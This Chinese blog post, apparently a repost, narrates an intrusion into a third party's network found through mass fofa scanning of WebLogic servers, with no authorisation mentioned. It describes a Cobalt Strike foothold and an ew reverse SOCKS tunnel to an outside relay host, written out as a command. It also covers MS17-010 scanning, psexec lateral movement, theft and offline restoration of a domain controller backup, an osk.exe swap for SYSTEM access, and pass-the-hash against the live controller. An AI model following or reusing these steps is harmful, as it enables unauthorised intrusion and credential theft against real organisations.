前言因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。 简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。 运行刚刚生成的powershell 这边的CS成功上线。
这里我们先来看看系统的信息。 根据上面的可知服务器是2012的,内网IP段在192.168.200.x 这个内网段机器不多,可以看出有域环境。接着进行了多网卡检测,web检测。 可以看出这个内网有多个网段,开了一个web服务。 密码可以在CMD5上解开 接下来就到最激动人心的扫描MS17010时刻!!! 可以看出有几台机器是可能存在MS17010的,所以打算开个socks代理直接MSF去打。 具体流程如下: ![]() 接着在目标机器上上传ew文件,执行:ew -s rssocks -d xxx.xxx.xxx.xxx(上方创建的服务器IP) -e 1200,开启目标主机socks5服务并反向连接到中转机器的1200端口,执行完稍等会就可以看到多了一行连接完成。 接着只需要在本地配置下代理就OK了。 因为我们要用的是本地虚拟机里面的kali的MSF,kali的代理配置比较方便,先vim /etc/proxychains.conf ,在最下面加上代理 保存后直接proxychains 加上要启动的程序就挂上代理了。 试了下弱口令注入啥的,没成功,谷歌翻译都翻译不过来,就算进了后台估计也看不懂,还是找其他途径吧。 查看保存登陆凭证,无 查看共享计算机列表 在最后一台时,发现成功访问了 右键一个beacon创建一个监听器 接着使用psexec_psh尝试上线192.168.200.6这台服务器 成功上线 ![]() 接下来就对新上线的机器做一波信息搜集 没有其他发现 可以看到有四台linux机器,分别是22 , 1 , 5 , 11 ![]() 简单的查看了进程之类的信息,没有发现,虽然这时候已经拿下了内网得两台机器,但是都不是域内机器,其他的linux主机测试弱口令又不正确,又陷入了僵局。 在D盘的文件夹下,发现了一个叫Backup的文件夹,里面存放了三个机器的备份。 一瞬间我的思路就清晰了,只需要在本地安装Veeam Backup & Replication这软件,再将这台DC的全量备份包压缩传到本地,再恢复成虚拟机,然后通过PE,用CMD.EXE重命名覆盖了OSK.exe,这样子就可以在登录界面调出system的命令行,再想办法添加管理员账户或者修改管理员账户进入界面,本地上线CS,再进行hashdump直接读出存储的域内用户HASH,在通过Pth就可以直接拿下线上的DC了。 又因为他备份的是其他IP的虚拟机,我猜想他应该是登陆了Vsphere。 本地下载的那个全量备份在本地还原也很简单,只需要装了软件双击就回自动打开软件。 还原完成 接下来就简单了。下载老毛桃 ,生成一个ISO的pe工具箱 挂载到虚拟机中,开机按ESC 进入PE后,重命名cmd.exe为osk.exe将原来C盘中的\windows\system32\osk.exe给覆盖了,这样子在开机的时候打开屏幕键盘就会弹出SYSTEM权限的命令行。 这里直接添加用户出现了点问题。 最后将某个域用户修改密码后添加到本地管理员组成功进入了系统。 把他关了。 然而关闭要密码– 接着最有仪式感的一幕 最后只需要拿着hash去怼线上的DC就完事了。 |
标签: 机器 一个 备份 服务器 可以 本地 直接 代理 上线 接着 出处: https://www.toutiao.com/a7051912615185875463/ |